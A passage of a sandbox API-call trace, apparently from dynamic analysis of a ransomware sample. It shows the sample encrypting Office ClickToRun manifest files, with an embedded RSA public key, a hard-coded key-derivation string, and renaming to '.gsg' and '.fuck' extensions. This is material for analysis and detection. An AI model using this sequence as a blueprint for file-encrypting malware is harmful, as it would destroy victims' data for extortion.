Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2897880*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2897888*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x282dfb8) returned 1 [0239.450] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.450] CryptEncrypt (in: hKey=0x282dfb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ac4f8*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ac4f8*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.451] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ac4f8, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.451] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.451] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.451] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.451] CloseHandle (hObject=0xffffffff) returned 1 [0239.451] CloseHandle (hObject=0xffffffff) returned 1 [0239.451] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.451] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.452] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.452] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.453] CryptDestroyHash (hHash=0x2893fb0) returned 1 [0239.453] CryptDestroyKey (hKey=0x2893af0) returned 1 [0239.453] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.453] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.453] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.453] GetLastError () returned 0x5 [0239.453] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml")) returned 0x20 [0239.453] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.454] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.454] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.454] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.455] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.457] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.457] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.457] CryptHashData (hHash=0x282e3f8, pbData=0x28571a0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.457] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x282e3f8, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x2893b70) returned 1 [0239.457] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.457] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.457] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ad020) returned 1 [0239.458] CryptImportPublicKeyInfo (in: hCryptProv=0x28ad020, dwCertEncodingType=0x1, pInfo=0x2898960*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898990*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898998*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x2893af0) returned 1 [0239.458] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.458] CryptEncrypt (in: hKey=0x2893af0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ac690*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ac690*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.458] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ac690, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.458] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.458] CryptEncrypt (in: hKey=0x2893b70, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.458] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.458] CloseHandle (hObject=0xffffffff) returned 1 [0239.458] CloseHandle (hObject=0xffffffff) returned 1 [0239.458] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), bFailIfExists=0) returned 0 [0239.459] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml", dwFileAttributes=0x0) returned 0 [0239.459] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.gsg")) returned 0 [0239.459] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Visio.Visio.x-none.msi.16.x-none.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visio.visio.x-none.msi.16.x-none.xml.fuck")) returned 0 [0239.460] CryptDestroyHash (hHash=0x282e3f8) returned 1 [0239.460] CryptDestroyKey (hKey=0x2893b70) returned 1 [0239.460] CryptReleaseContext (hProv=0x28ab150, dwFlags=0x0) returned 1 [0239.460] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.460] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.460] GetLastError () returned 0x5 [0239.460] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml")) returned 0x20 [0239.460] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml", dwFileAttributes=0x80) returned 0 [0239.460] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.461] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.461] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.462] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28accf0) returned 1 [0239.472] CryptCreateHash (in: hProv=0x28accf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.472] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.472] CryptHashData (hHash=0x2893b70, pbData=0x2856de0, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.472] CryptDeriveKey (in: hProv=0x28accf0, Algid=0x6610, hBaseData=0x2893b70, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x282e3f8) returned 1 [0239.472] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.472] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.472] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28acbe0) returned 1 [0239.473] CryptImportPublicKeyInfo (in: hCryptProv=0x28acbe0, dwCertEncodingType=0x1, pInfo=0x2898ca0*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898cd0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898cd8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x282deb8) returned 1 [0239.473] CryptEncrypt (in: hKey=0x282deb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.473] CryptEncrypt (in: hKey=0x282deb8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28ac718*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28ac718*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.473] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28ac718, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.473] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.473] CryptEncrypt (in: hKey=0x282e3f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.473] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.473] CloseHandle (hObject=0xffffffff) returned 1 [0239.473] CloseHandle (hObject=0xffffffff) returned 1 [0239.473] CopyFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml.gsg"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml"), bFailIfExists=0) returned 0 [0239.473] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml", dwFileAttributes=0x0) returned 0 [0239.474] DeleteFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml.gsg")) returned 0 [0239.474] MoveFileA (lpExistingFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml"), lpNewFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.visiomui.msi.16.en-us.xml.fuck" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.visiomui.msi.16.en-us.xml.fuck")) returned 0 [0239.475] CryptDestroyHash (hHash=0x2893b70) returned 1 [0239.475] CryptDestroyKey (hKey=0x282e3f8) returned 1 [0239.475] CryptReleaseContext (hProv=0x28accf0, dwFlags=0x0) returned 1 [0239.475] FindNextFileA (in: hFindFile=0x2893cf0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0239.475] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e938 | out: lpSystemTimeAsFileTime=0x2b9e938) [0239.475] GetLastError () returned 0x5 [0239.475] GetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml")) returned 0x20 [0239.475] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml", dwFileAttributes=0x80) returned 0 [0239.475] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.476] CreateFileA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.gsg" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0239.476] SetFileAttributesA (lpFileName="C:\\\\Users\\All Users\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.gsg", dwFileAttributes=0x2) returned 0 [0239.476] CryptAcquireContextA (in: phProv=0x2b9d934, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d934*=0x28ab150) returned 1 [0239.478] CryptCreateHash (in: hProv=0x28ab150, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d938 | out: phHash=0x2b9d938) returned 1 [0239.478] lstrlenA (lpString="BnDJACPrUGotpmdReKbXlIsdzMlQm") returned 29 [0239.478] CryptHashData (hHash=0x2893fb0, pbData=0x28573f8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0239.478] CryptDeriveKey (in: hProv=0x28ab150, Algid=0x6610, hBaseData=0x2893fb0, dwFlags=0x1000000, phKey=0x2b9d924 | out: phKey=0x2b9d924*=0x28467e0) returned 1 [0239.478] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d940, pcbBinary=0x2b9d920, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0239.478] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d940, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c | out: pvStructInfo=0x2b9d914, pcbStructInfo=0x2b9d91c) returned 1 [0239.479] CryptAcquireContextA (in: phProv=0x2b9d930, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d930*=0x28ac7a0) returned 1 [0239.479] CryptImportPublicKeyInfo (in: hCryptProv=0x28ac7a0, dwCertEncodingType=0x1, pInfo=0x2898d70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2898da0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2898da8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d928 | out: phKey=0x2b9d928*=0x282e3f8) returned 1 [0239.479] CryptEncrypt (in: hKey=0x282e3f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d918*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d918*=0x80) returned 1 [0239.479] CryptEncrypt (in: hKey=0x282e3f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28accf0*, pdwDataLen=0x2b9d92c*=0x18, dwBufLen=0x80 | out: pbData=0x28accf0*, pdwDataLen=0x2b9d92c*=0x80) returned 1 [0239.479] WriteFile (in: hFile=0xffffffff, lpBuffer=0x28accf0, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.479] ReadFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d93c, lpOverlapped=0x0 | out: lpBuffer=0x27792e8, lpNumberOfBytesRead=0x2b9d93c*=0x0, lpOverlapped=0x0) returned 0 [0239.480] CryptEncrypt (in: hKey=0x28467e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x0, dwBufLen=0x400 | out: pbData=0x27792e8*, pdwDataLen=0x2b9d93c*=0x10) returned 1 [0239.480] WriteFile (in: hFile=0xffffffff, lpBuffer=0x27792e8, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d93c, lpOverlapped=0x0) returned 0 [0239.480] CloseHandle (hObject=0xffffffff) returned 1 [0239.480] CloseHandle (hObject=0xffffffff) returned 1 [0239.480] CopyFileA (lpExistingFileName="C:\\\\Users\\All 